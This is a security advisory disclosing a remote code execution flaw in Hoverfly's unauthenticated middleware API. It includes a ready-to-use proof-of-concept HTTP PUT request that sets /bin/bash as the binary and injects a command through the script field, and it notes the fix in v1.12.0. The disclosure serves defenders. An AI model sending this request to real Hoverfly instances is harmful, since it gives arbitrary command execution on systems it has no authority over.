Remote Code Execution in Hoverfly Middleware API (/api/v2/hoverfly/middleware) | CVE Disclosure | Principle Breach

Summary

A command injection vulnerability was identified in Hoverfly’s middleware management API at /api/v2/hoverfly/middleware due to unsafe handling of user-supplied input. The application allows attacker-controlled values to be passed directly to system command execution during middleware validation, resulting in immediate execution of arbitrary commands. Successful exploitation enables remote code execution with the privileges of the Hoverfly process and can be abused to run arbitrary commands or spawn reverse shells. This flaw poses a critical risk to systems running vulnerable Hoverfly versions.

Proof of Concept

Preconditions

A vulnerable Hoverfly instance is running
Admin API is accessible (default: `http://<target>:8888`)
No authentication is required, or valid admin credentials are available

Send the following HTTP PUT request to the middleware endpoint. The payload abuses the binary field to execute /bin/bash and injects an arbitrary command via the script field.

```

PUT /api/v2/hoverfly/middleware HTTP/1.1

Host: localhost:8888

Content-Type: application/json

Connection: close

{"binary": "/bin/bash","script": "whoami"}

```

During middleware validation, Hoverfly writes the script to a temporary file and immediately executes it using the user-controlled binary. The command runs with the privileges of the Hoverfly process.

Remediation

This vulnerability has been addressed in Hoverfly version v1.12.0 and later.

Remote Code Execution in Hoverfly Middleware API (/api/v2/hoverfly/middleware) .

Preconditions